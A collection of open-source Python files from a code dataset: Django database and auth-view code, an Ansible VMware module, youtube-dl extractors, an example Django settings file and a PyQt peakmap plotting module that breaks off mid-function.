name = TEST_DATABASE_PREFIX + self.connection.settings_dict['USER']
try:
if self.connection.settings_dict['TEST_USER']:
name = self.connection.settings_dict['TEST_USER']
except KeyError:
pass
return name
def _test_database_passwd(self):
name = PASSWORD
try:
if self.connection.settings_dict['TEST_PASSWD']:
name = self.connection.settings_dict['TEST_PASSWD']
except KeyError:
pass
return name
def _test_database_tblspace(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_TBLSPACE']:
name = self.connection.settings_dict['TEST_TBLSPACE']
except KeyError:
pass
return name
def _test_database_tblspace_tmp(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME'] + '_temp'
try:
if self.connection.settings_dict['TEST_TBLSPACE_TMP']:
name = self.connection.settings_dict['TEST_TBLSPACE_TMP']
except KeyError:
pass
return name
def _get_test_db_name(self):
"""
We need to return the 'production' DB name to get the test DB creation
machinery to work. This isn't a great deal in this case because DB
names as handled by Django haven't real counterparts in Oracle.
"""
return self.connection.settings_dict['NAME']
def test_db_signature(self):
settings_dict = self.connection.settings_dict
return (
settings_dict['HOST'],
settings_dict['PORT'],
settings_dict['ENGINE'],
settings_dict['NAME'],
self._test_database_user(),
)
| apache-2.0 |
lmprice/ansible | lib/ansible/modules/cloud/vmware/vmware_migrate_vmk.py | 25 | 7048 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Joseph Callen <jcallen () csc.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_migrate_vmk
short_description: Migrate a VMK interface from VSS to VDS
description:
- Migrate a VMK interface from VSS to VDS
version_added: 2.0
author:
- Joseph Callen (@jcpowermac)
- Russell Teague (@mtnbikenc)
notes:
- Tested on vSphere 5.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
esxi_hostname:
description:
- ESXi hostname to be managed
required: True
device:
description:
- VMK interface name
required: True
current_switch_name:
description:
- Switch VMK interface is currently on
required: True
current_portgroup_name:
description:
- Portgroup name VMK interface is currently on
required: True
migrate_switch_name:
description:
- Switch name to migrate VMK interface to
required: True
migrate_portgroup_name:
description:
- Portgroup name to migrate VMK interface to
required: True
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
# Example from Ansible playbook
- name: Migrate Management vmk
local_action:
module: vmware_migrate_vmk
hostname: vcsa_host
username: vcsa_user
password: vcsa_pass
esxi_hostname: esxi_hostname
device: vmk1
current_switch_name: temp_vswitch
current_portgroup_name: esx-mgmt
migrate_switch_name: dvSwitch
migrate_portgroup_name: Management
'''
try:
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import (vmware_argument_spec, find_dvs_by_name, find_hostsystem_by_name,
connect_to_api, find_dvspg_by_name)
class VMwareMigrateVmk(object):
def __init__(self, module):
self.module = module
self.host_system = None
self.migrate_switch_name = self.module.params['migrate_switch_name']
self.migrate_portgroup_name = self.module.params['migrate_portgroup_name']
self.device = self.module.params['device']
self.esxi_hostname = self.module.params['esxi_hostname']
self.current_portgroup_name = self.module.params['current_portgroup_name']
self.current_switch_name = self.module.params['current_switch_name']
self.content = connect_to_api(module)
def process_state(self):
try:
vmk_migration_states = {
'migrate_vss_vds': self.state_migrate_vss_vds,
'migrate_vds_vss': self.state_migrate_vds_vss,
'migrated': self.state_exit_unchanged
}
vmk_migration_states[self.check_vmk_current_state()]()
except vmodl.RuntimeFault as runtime_fault:
self.module.fail_json(msg=runtime_fault.msg)
except vmodl.MethodFault as method_fault:
self.module.fail_json(msg=method_fault.msg)
except Exception as e:
self.module.fail_json(msg=str(e))
def state_exit_unchanged(self):
self.module.exit_json(changed=False)
def state_migrate_vds_vss(self):
self.module.exit_json(changed=False, msg="Currently Not Implemented")
def create_host_vnic_config(self, dv_switch_uuid, portgroup_key):
host_vnic_config = vim.host.VirtualNic.Config()
host_vnic_config.spec = vim.host.VirtualNic.Specification()
host_vnic_config.changeOperation = "edit"
host_vnic_config.device = self.device
host_vnic_config.portgroup = ""
host_vnic_config.spec.distributedVirtualPort = vim.dvs.PortConnection()
host_vnic_config.spec.distributedVirtualPort.switchUuid = dv_switch_uuid
host_vnic_config.spec.distributedVirtualPort.portgroupKey = portgroup_key
return host_vnic_config
def create_port_group_config(self):
port_group_config = vim.host.PortGroup.Config()
port_group_config.spec = vim.host.PortGroup.Specification()
port_group_config.changeOperation = "remove"
port_group_config.spec.name = self.current_portgroup_name
port_group_config.spec.vlanId = -1
port_group_config.spec.vswitchName = self.current_switch_name
port_group_config.spec.policy = vim.host.NetworkPolicy()
return port_group_config
def state_migrate_vss_vds(self):
host_network_system = self.host_system.configManager.networkSystem
dv_switch = find_dvs_by_name(self.content, self.migrate_switch_name)
pg = find_dvspg_by_name(dv_switch, self.migrate_portgroup_name)
config = vim.host.NetworkConfig()
config.portgroup = [self.create_port_group_config()]
config.vnic = [self.create_host_vnic_config(dv_switch.uuid, pg.key)]
host_network_system.UpdateNetworkConfig(config, "modify")
self.module.exit_json(changed=True)
def check_vmk_current_state(self):
self.host_system = find_hostsystem_by_name(self.content, self.esxi_hostname)
for vnic in self.host_system.configManager.networkSystem.networkInfo.vnic:
if vnic.device == self.device:
# self.vnic = vnic
if vnic.spec.distributedVirtualPort is None:
if vnic.portgroup == self.current_portgroup_name:
return "migrate_vss_vds"
else:
dvs = find_dvs_by_name(self.content, self.current_switch_name)
if dvs is None:
return "migrated"
if vnic.spec.distributedVirtualPort.switchUuid == dvs.uuid:
return "migrate_vds_vss"
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(dict(esxi_hostname=dict(required=True, type='str'),
device=dict(required=True, type='str'),
current_switch_name=dict(required=True, type='str'),
current_portgroup_name=dict(required=True, type='str'),
migrate_switch_name=dict(required=True, type='str'),
migrate_portgroup_name=dict(required=True, type='str')))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)
if not HAS_PYVMOMI:
module.fail_json(msg='pyvmomi required for this module')
vmware_migrate_vmk = VMwareMigrateVmk(module)
vmware_migrate_vmk.process_state()
if __name__ == '__main__':
main()
| gpl-3.0 |
MCMic/Sick-Beard | lib/subliminal/exceptions.py | 170 | 1050 | # -*- coding: utf-8 -*-
# Copyright 2011-2012 Antoine Bertin <diaoulael@gmail.com>
#
# This file is part of subliminal.
#
# subliminal is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# subliminal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with subliminal. If not, see <http://www.gnu.org/licenses/>.
class Error(Exception):
"""Base class for exceptions in subliminal"""
pass
class ServiceError(Error):
""""Exception raised by services"""
pass
class DownloadFailedError(Error):
""""Exception raised when a download task has failed in service"""
pass
| gpl-3.0 |
benjaminjkraft/django | django/contrib/auth/views.py | 10 | 11936 | import functools
import warnings
from django.conf import settings
# Avoid shadowing the login() and logout() views below.
from django.contrib.auth import (
REDIRECT_FIELD_NAME, get_user_model, login as auth_login,
logout as auth_logout, update_session_auth_hash,
)
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import (
AuthenticationForm, PasswordChangeForm, PasswordResetForm, SetPasswordForm,
)
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.shortcuts import get_current_site
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import resolve_url
from django.template.response import TemplateResponse
from django.urls import reverse
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_text
from django.utils.http import is_safe_url, urlsafe_base64_decode
from django.utils.six.moves.urllib.parse import urlparse, urlunparse
from django.utils.translation import ugettext as _
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
def deprecate_current_app(func):
"""
Handle deprecation of the current_app parameter of the views.
"""
@functools.wraps(func)
def inner(*args, **kwargs):
if 'current_app' in kwargs:
warnings.warn(
"Passing `current_app` as a keyword argument is deprecated. "
"Instead the caller of `{0}` should set "
"`request.current_app`.".format(func.__name__),
RemovedInDjango20Warning
)
current_app = kwargs.pop('current_app')
request = kwargs.get('request', None)
if request and current_app is not None:
request.current_app = current_app
return func(*args, **kwargs)
return inner
@deprecate_current_app
@sensitive_post_parameters()
@csrf_protect
@never_cache
def login(request, template_name='registration/login.html',
redirect_field_name=REDIRECT_FIELD_NAME,
authentication_form=AuthenticationForm,
extra_context=None):
"""
Displays the login form and handles the login action.
"""
redirect_to = request.POST.get(redirect_field_name,
request.GET.get(redirect_field_name, ''))
if request.method == "POST":
form = authentication_form(request, data=request.POST)
if form.is_valid():
# Ensure the user-originating redirection url is safe.
if not is_safe_url(url=redirect_to, host=request.get_host()):
redirect_to = resolve_url(settings.LOGIN_REDIRECT_URL)
# Okay, security check complete. Log the user in.
auth_login(request, form.get_user())
return HttpResponseRedirect(redirect_to)
else:
form = authentication_form(request)
current_site = get_current_site(request)
context = {
'form': form,
redirect_field_name: redirect_to,
'site': current_site,
'site_name': current_site.name,
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
@deprecate_current_app
@never_cache
def logout(request, next_page=None,
template_name='registration/logged_out.html',
redirect_field_name=REDIRECT_FIELD_NAME,
extra_context=None):
"""
Logs out the user and displays 'You are logged out' message.
"""
auth_logout(request)
if next_page is not None:
next_page = resolve_url(next_page)
if (redirect_field_name in request.POST or
redirect_field_name in request.GET):
next_page = request.POST.get(redirect_field_name,
request.GET.get(redirect_field_name))
# Security check -- don't allow redirection to a different host.
if not is_safe_url(url=next_page, host=request.get_host()):
next_page = request.path
if next_page:
# Redirect to this page until the session has been cleared.
return HttpResponseRedirect(next_page)
current_site = get_current_site(request)
context = {
'site': current_site,
'site_name': current_site.name,
'title': _('Logged out')
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
@deprecate_current_app
def logout_then_login(request, login_url=None, extra_context=None):
"""
Logs out the user if they are logged in. Then redirects to the log-in page.
"""
if not login_url:
login_url = settings.LOGIN_URL
login_url = resolve_url(login_url)
return logout(request, login_url, extra_context=extra_context)
def redirect_to_login(next, login_url=None,
redirect_field_name=REDIRECT_FIELD_NAME):
"""
Redirects the user to the login page, passing the given 'next' page
"""
resolved_url = resolve_url(login_url or settings.LOGIN_URL)
login_url_parts = list(urlparse(resolved_url))
if redirect_field_name:
querystring = QueryDict(login_url_parts[4], mutable=True)
querystring[redirect_field_name] = next
login_url_parts[4] = querystring.urlencode(safe='/')
return HttpResponseRedirect(urlunparse(login_url_parts))
# 4 views for password reset:
# - password_reset sends the mail
# - password_reset_done shows a success message for the above
# - password_reset_confirm checks the link the user clicked and
# prompts for a new password
# - password_reset_complete shows a success message for the above
@deprecate_current_app
@csrf_protect
def password_reset(request,
template_name='registration/password_reset_form.html',
email_template_name='registration/password_reset_email.html',
subject_template_name='registration/password_reset_subject.txt',
password_reset_form=PasswordResetForm,
token_generator=default_token_generator,
post_reset_redirect=None,
from_email=None,
extra_context=None,
html_email_template_name=None,
extra_email_context=None):
if post_reset_redirect is None:
post_reset_redirect = reverse('password_reset_done')
else:
post_reset_redirect = resolve_url(post_reset_redirect)
if request.method == "POST":
form = password_reset_form(request.POST)
if form.is_valid():
opts = {
'use_https': request.is_secure(),
'token_generator': token_generator,
'from_email': from_email,
'email_template_name': email_template_name,
'subject_template_name': subject_template_name,
'request': request,
'html_email_template_name': html_email_template_name,
'extra_email_context': extra_email_context,
}
form.save(**opts)
return HttpResponseRedirect(post_reset_redirect)
else:
form = password_reset_form()
context = {
'form': form,
'title': _('Password reset'),
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
@deprecate_current_app
def password_reset_done(request,
template_name='registration/password_reset_done.html',
extra_context=None):
context = {
'title': _('Password reset sent'),
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
# Doesn't need csrf_protect since no-one can guess the URL
@sensitive_post_parameters()
@never_cache
@deprecate_current_app
def password_reset_confirm(request, uidb64=None, token=None,
template_name='registration/password_reset_confirm.html',
token_generator=default_token_generator,
set_password_form=SetPasswordForm,
post_reset_redirect=None,
extra_context=None):
"""
View that checks the hash in a password reset link and presents a
form for entering a new password.
"""
UserModel = get_user_model()
assert uidb64 is not None and token is not None # checked by URLconf
if post_reset_redirect is None:
post_reset_redirect = reverse('password_reset_complete')
else:
post_reset_redirect = resolve_url(post_reset_redirect)
try:
# urlsafe_base64_decode() decodes to bytestring on Python 3
uid = force_text(urlsafe_base64_decode(uidb64))
user = UserModel._default_manager.get(pk=uid)
except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist):
user = None
if user is not None and token_generator.check_token(user, token):
validlink = True
title = _('Enter new password')
if request.method == 'POST':
form = set_password_form(user, request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(post_reset_redirect)
else:
form = set_password_form(user)
else:
validlink = False
form = None
title = _('Password reset unsuccessful')
context = {
'form': form,
'title': title,
'validlink': validlink,
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
@deprecate_current_app
def password_reset_complete(request,
template_name='registration/password_reset_complete.html',
extra_context=None):
context = {
'login_url': resolve_url(settings.LOGIN_URL),
'title': _('Password reset complete'),
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
@sensitive_post_parameters()
@csrf_protect
@login_required
@deprecate_current_app
def password_change(request,
template_name='registration/password_change_form.html',
post_change_redirect=None,
password_change_form=PasswordChangeForm,
extra_context=None):
if post_change_redirect is None:
post_change_redirect = reverse('password_change_done')
else:
post_change_redirect = resolve_url(post_change_redirect)
if request.method == "POST":
form = password_change_form(user=request.user, data=request.POST)
if form.is_valid():
form.save()
# Updating the password logs out all other sessions for the user
# except the current one.
update_session_auth_hash(request, form.user)
return HttpResponseRedirect(post_change_redirect)
else:
form = password_change_form(user=request.user)
context = {
'form': form,
'title': _('Password change'),
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
@login_required
@deprecate_current_app
def password_change_done(request,
template_name='registration/password_change_done.html',
extra_context=None):
context = {
'title': _('Password change successful'),
}
if extra_context is not None:
context.update(extra_context)
return TemplateResponse(request, template_name, context)
| bsd-3-clause |
MarkTheF4rth/youtube-dl | youtube_dl/extractor/howcast.py | 95 | 1336 | from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import parse_iso8601
class HowcastIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?howcast\.com/videos/(?P<id>\d+)'
_TEST = {
'url': 'http://www.howcast.com/videos/390161-How-to-Tie-a-Square-Knot-Properly',
'md5': '8b743df908c42f60cf6496586c7f12c3',
'info_dict': {
'id': '390161',
'ext': 'mp4',
'title': 'How to Tie a Square Knot Properly',
'description': 'md5:dbe792e5f6f1489027027bf2eba188a3',
'timestamp': 1276081287,
'upload_date': '20100609',
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
embed_code = self._search_regex(
r'<iframe[^>]+src="[^"]+\bembed_code=([^\b]+)\b',
webpage, 'ooyala embed code')
return {
'_type': 'url_transparent',
'ie_key': 'Ooyala',
'url': 'ooyala:%s' % embed_code,
'id': video_id,
'timestamp': parse_iso8601(self._html_search_meta(
'article:published_time', webpage, 'timestamp')),
}
| unlicense |
sbunatyan/tavrida | examples/django/hello_world/settings.py | 1 | 2392 | """
Django settings for hello_world project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7cv!&bfbwov!b-yq7rf$i$+lok62e==ozhf2c7-1d-if!0g*d9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.staticfiles',
'my_app',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hello_world.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hello_world.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, ''),
)
| apache-2.0 |
pim89/youtube-dl | youtube_dl/extractor/wsj.py | 15 | 3206 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
float_or_none,
unified_strdate,
)
class WSJIE(InfoExtractor):
_VALID_URL = r'''(?x)https?://
(?:
video-api\.wsj\.com/api-video/player/iframe\.html\?guid=|
(?:www\.)?wsj\.com/video/[^/]+/
)
(?P<id>[a-zA-Z0-9-]+)'''
IE_DESC = 'Wall Street Journal'
_TESTS = [{
'url': 'http://video-api.wsj.com/api-video/player/iframe.html?guid=1BD01A4C-BFE8-40A5-A42F-8A8AF9898B1A',
'md5': 'e230a5bb249075e40793b655a54a02e4',
'info_dict': {
'id': '1BD01A4C-BFE8-40A5-A42F-8A8AF9898B1A',
'ext': 'mp4',
'upload_date': '20150202',
'uploader_id': 'jdesai',
'creator': 'jdesai',
'categories': list, # a long list
'duration': 90,
'title': 'Bills Coach Rex Ryan Updates His Old Jets Tattoo',
},
}, {
'url': 'http://www.wsj.com/video/can-alphabet-build-a-smarter-city/359DDAA8-9AC1-489C-82E6-0429C1E430E0.html',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
api_url = (
'http://video-api.wsj.com/api-video/find_all_videos.asp?'
'type=guid&count=1&query=%s&fields=type,hls,videoMP4List,'
'thumbnailList,author,description,name,duration,videoURL,'
'titletag,formattedCreationDate,keywords,editor' % video_id)
info = self._download_json(api_url, video_id)['items'][0]
title = info.get('name', info.get('titletag'))
formats = []
f4m_url = info.get('videoURL')
if f4m_url:
formats.extend(self._extract_f4m_formats(
f4m_url, video_id, f4m_id='hds', fatal=False))
m3u8_url = info.get('hls')
if m3u8_url:
formats.extend(self._extract_m3u8_formats(
info['hls'], video_id, ext='mp4',
entry_protocol='m3u8_native', m3u8_id='hls', fatal=False))
for v in info.get('videoMP4List', []):
mp4_url = v.get('url')
if not mp4_url:
continue
tbr = int_or_none(v.get('bitrate'))
formats.append({
'url': mp4_url,
'format_id': 'http' + ('-%d' % tbr if tbr else ''),
'tbr': tbr,
'width': int_or_none(v.get('width')),
'height': int_or_none(v.get('height')),
'fps': float_or_none(v.get('fps')),
})
self._sort_formats(formats)
return {
'id': video_id,
'formats': formats,
# Thumbnails are conveniently in the correct format already
'thumbnails': info.get('thumbnailList'),
'creator': info.get('author'),
'uploader_id': info.get('editor'),
'duration': int_or_none(info.get('duration')),
'upload_date': unified_strdate(info.get(
'formattedCreationDate'), day_first=False),
'title': title,
'categories': info.get('keywords'),
}
| unlicense |
uweschmitt/ivi | ivi/gui/peakmapplotter.py | 1 | 35955 | # -*- coding: utf-8 -*-
import types
import numpy as np
from PyQt4.QtGui import (QDialog, QGridLayout, QSlider, QLabel, QCheckBox, QWidget,
QLineEdit, QFrame, QSizePolicy, QHBoxLayout, QPushButton, QMenuBar,
QAction, QMenu, QKeySequence, QVBoxLayout, QFileDialog, QPixmap, QPainter,
QTableWidget, QPen, QBrush, QColor, QPolygonF, QTransform,
QTableWidgetItem, QSplitter, QHeaderView, QSpacerItem, QTextDocument)
from PyQt4.QtCore import (Qt, SIGNAL, QRectF, QPointF, pyqtSignal)
from PyQt4.QtWebKit import (QWebView, QWebSettings)
from PyQt4.Qwt5 import (QwtScaleDraw, QwtText)
import guidata
from guiqwt.builder import make
from guiqwt.config import CONF
from guiqwt.events import (KeyEventMatch, QtDragHandler, PanHandler, MoveHandler, ZoomHandler,)
from guiqwt.interfaces import IBasePlotItem, IShapeItemType
from guiqwt.image import ImagePlot, RawImageItem
from guiqwt.label import ObjectInfo
from guiqwt.plot import ImageWidget
from guiqwt.shapes import RectangleShape, AbstractShape, QwtPlotItem
from guiqwt.signals import (SIG_MOVE, SIG_START_TRACKING, SIG_STOP_NOT_MOVING, SIG_STOP_MOVING,
SIG_PLOT_AXIS_CHANGED, )
from guiqwt.tools import SelectTool, InteractiveTool
from guiqwt.transitional import QwtSymbol
from helpers import protect_signal_handler
from ..lib.data_structures import Feature, PeakRange, PeakMap
from utils import set_x_axis_scale_draw, set_y_axis_scale_draw
from lru_cache import lru_cache
class PeakMapImageBase(object):
def __init__(self, peakmaps):
self.peakmaps = peakmaps
ranges = [pm.get_ranges() for pm in peakmaps if len(pm)]
if ranges: # list might be empty
rtmins, rtmaxs, mzmins, mzmaxs, iimins, iimaxs = zip(*ranges)
self.rtmin = min(rtmins)
self.rtmax = max(rtmaxs)
self.mzmin = min(mzmins)
self.mzmax = max(mzmaxs)
self.imax = max(iimaxs)
else:
self.rtmin = self.rtmax = self.mzmin = self.mzmax = self.imax = 0.0
self.bounds = QRectF(QPointF(self.rtmin, self.mzmin), QPointF(self.rtmax, self.mzmax))
self.imin = 0.0
self.upper_limit_imax = self.imax
self.gamma = 1.0
self.log_scale = 1
self.cached_matrix = None
def get_peakmap_bounds(self):
return self.rtmin, self.rtmax, self.mzmin, self.mzmax
def set_processing_parameters(self, parameters):
self.set_gamma(parameters.gamma)
self.set_logarithmic_scale(parameters.log_scale)
self.set_imin(parameters.imin)
self.set_imax(parameters.imax)
def set_gamma(self, gamma):
self.gamma = gamma
def set_logarithmic_scale(self, log_scale):
self.log_scale = log_scale
def set_imin(self, imin):
self.imin = imin
def set_imax(self, imax):
self.imax = imax
def get_gamma(self):
return self.gama
@lru_cache(maxsize=100)
# NX = 400, NX = 300 -> per image 300 * 400 * 1 byte = 12e4 bytes
# 100 images in cache: 12e6 bytes = 12 mb
def compute_image(self, idx, NX, NY, rtmin, rtmax, mzmin, mzmax):
if rtmin >= rtmax or mzmin >= mzmax:
smoothed = np.zeros((1, 1))
else:
# optimized:
# one additional row / col as we loose one row and col during smoothing:
#data = sample_image(self.peakmaps[idx], rtmin, rtmax, mzmin, mzmax, NX + 1, NY + 1)
data = self.peakmaps[idx].sample_image(rtmin, rtmax, mzmin, mzmax, NX + 1, NY + 1, 1)
# enlarge single pixels to 2 x 2 pixels:
smoothed = data[:-1, :-1] + data[:-1, 1:] + data[1:, :-1] + data[1:, 1:]
# turn up/down
smoothed = smoothed[::-1, :]
imin = self.imin
imax = self.imax
if self.log_scale:
smoothed = np.log(1.0 + smoothed)
imin = np.log(1.0 + imin)
imax = np.log(1.0 + imax)
smoothed[smoothed < imin] = imin
smoothed[smoothed > imax] = imax
smoothed -= imin
# scale to 1.0
maxd = np.max(smoothed)
if maxd:
smoothed /= maxd
# apply gamma
smoothed = smoothed ** (self.gamma) * 255
to_plot = smoothed.astype(np.uint8)
return to_plot
class PeakMapImageItem(PeakMapImageBase, RawImageItem):
""" draws peakmap 2d view dynamically based on given limits """
def __init__(self, peakmap):
RawImageItem.__init__(self, data=np.zeros((1, 1), np.uint8))
PeakMapImageBase.__init__(self, [peakmap])
self.update_border()
self.IMAX = 255
self.set_lut_range([0, self.IMAX])
self.set_color_map("hot")
self.last_canvas_rect = None
self.last_src_rect = None
self.last_dst_rect = None
self.last_xmap = None
self.last_ymap = None
def paint_pixmap(self, widget):
assert self.last_canvas_rect is not None
x1, y1 = self.last_canvas_rect.left(), self.last_canvas_rect.top()
x2, y2 = self.last_canvas_rect.right(), self.last_canvas_rect.bottom()
NX = x2 - x1
NY = y2 - y1
pix = QPixmap(NX, NY)
painter = QPainter(pix)
painter.begin(widget)
try:
self.draw_border(painter, self.last_xmap, self.last_ymap, self.last_canvas_rect)
self.draw_image(painter, self.last_canvas_rect, self.last_src_rect, self.last_dst_rect,
self.last_xmap, self.last_xmap)
# somehow guiqwt paints a distorted border at left/top, so we remove it:
return pix.copy(2, 2, NX - 2, NY - 2)
finally:
painter.end()
#---- QwtPlotItem API ------------------------------------------------------
def draw_image(self, painter, canvasRect, srcRect, dstRect, xMap, yMap):
# normally we use this method indirectly from quiqwt which takes the burden of constructing
# the right parameters. if we want to call this method manually, eg for painting on on a
# QPixmap for saving the image, we just use the last set of parmeters passed to this
# method, this is much easier than constructing the params seperatly, and so we get the
# exact same result as we see on screen:
self.last_canvas_rect = canvasRect
self.last_src_rect = srcRect
self.last_dst_rect = dstRect
self.last_xmap = xMap
self.last_ymap = yMap
x1, y1 = canvasRect.left(), canvasRect.top()
x2, y2 = canvasRect.right(), canvasRect.bottom()
NX = x2 - x1
NY = y2 - y1
rtmin, mzmax, rtmax, mzmin = srcRect
self.data = self.compute_image(0, NX, NY, rtmin, rtmax, mzmin, mzmax)
# draw
srcRect = (0, 0, NX, NY)
x1, y1, x2, y2 = canvasRect.getCoords()
RawImageItem.draw_image(self, painter, canvasRect, srcRect, (x1, y1, x2, y2), xMap, yMap)
class PeakmapCursorRangeInfo(ObjectInfo):
def __init__(self, marker):
ObjectInfo.__init__(self)
self.marker = marker
def get_text(self):
rtmin, mzmin, rtmax, mzmax = self.marker.get_rect()
if not np.isnan(rtmax):
rtmin, rtmax = sorted((rtmin, rtmax))
if not np.isnan(mzmax):
mzmin, mzmax = sorted((mzmin, mzmax))
if not np.isnan(rtmax):
delta_mz = mzmax - mzmin
delta_rt = rtmax - rtmin
line0 = "mz: %10.5f .. %10.5f (delta=%5.5f)" % (mzmin, mzmax, delta_mz)
line1 = "rt: %6.2fm .. %6.2fm (delta=%.1fs)" % (rtmin / 60.0,
rtmax / 60.0,
delta_rt)
return "<pre>%s</pre>" % "<br>".join((line0, line1))
else:
return """<pre>mz: %9.5f<br>rt: %6.2fm</pre>""" % (mzmin, rtmin / 60.0)
class PeakmapZoomTool(InteractiveTool):
""" selects rectangle from peakmap """
TITLE = "Selection"
ICON = "selection.png"
CURSOR = Qt.CrossCursor
def setup_filter(self, baseplot):
filter_ = baseplot.filter
# Initialisation du filtre
start_state = filter_.new_state()
filter_.add_event(start_state,
KeyEventMatch((Qt.Key_Backspace, Qt.Key_Escape, Qt.Key_Home)),
baseplot.reset_zoom_to_full_map, start_state)
filter_.add_event(start_state,
KeyEventMatch((Qt.Key_Space,)), baseplot.reset_zoom_to_initial_view,
start_state)
handler = QtDragHandler(filter_, Qt.LeftButton, start_state=start_state)
self.connect(handler, SIG_MOVE, baseplot.move_in_drag_mode)
self.connect(handler, SIG_START_TRACKING, baseplot.start_drag_mode)
self.connect(handler, SIG_STOP_NOT_MOVING, baseplot.stop_drag_mode)
self.connect(handler, SIG_STOP_MOVING, baseplot.stop_drag_mode)
handler = QtDragHandler(
filter_, Qt.LeftButton, start_state=start_state, mods=Qt.ShiftModifier)
self.connect(handler, SIG_MOVE, baseplot.move_in_drag_mode)
self.connect(handler, SIG_START_TRACKING, baseplot.start_drag_mode)
self.connect(handler, SIG_STOP_NOT_MOVING, baseplot.stop_drag_mode)
self.connect(handler, SIG_STOP_MOVING, baseplot.stop_drag_mode)
# Bouton du milieu
PanHandler(filter_, Qt.MidButton, start_state=start_state)
PanHandler(filter_, Qt.LeftButton, mods=Qt.AltModifier, start_state=start_state)
# AutoZoomHandler(filter_, Qt.MidButton, start_state=start_state)
# Bouton droit
ZoomHandler(filter_, Qt.RightButton, start_state=start_state)
ZoomHandler(filter_, Qt.LeftButton, mods=Qt.ControlModifier, start_state=start_state)
# MenuHandler(filter_, Qt.RightButton, start_state=start_state)
# Autres (touches, move)
MoveHandler(filter_, start_state=start_state)
MoveHandler(filter_, start_state=start_state, mods=Qt.ShiftModifier)
MoveHandler(filter_, start_state=start_state, mods=Qt.AltModifier)
return start_state
class ModifiedImagePlot(ImagePlot):
""" special handlers for dragging selection, source is PeakmapZoomTool """
# as this class is used for patching, the __init__ is never called, so we set default
# values as class atributes:
rtmin = rtmax = mzmin = mzmax = imin = imax = None
peakmap_range = (None, None, None, None, None, None)
coords = (None, None)
dragging = False
chromatogram_plot = None
mz_plot = None
def set_initial_image_limits(self, rtmin, rtmax, mzmin, mzmax):
# sollte man später durch history funktion ersetzen könnnen..
self.rtmin = max(rtmin, self.peakmap_range[0])
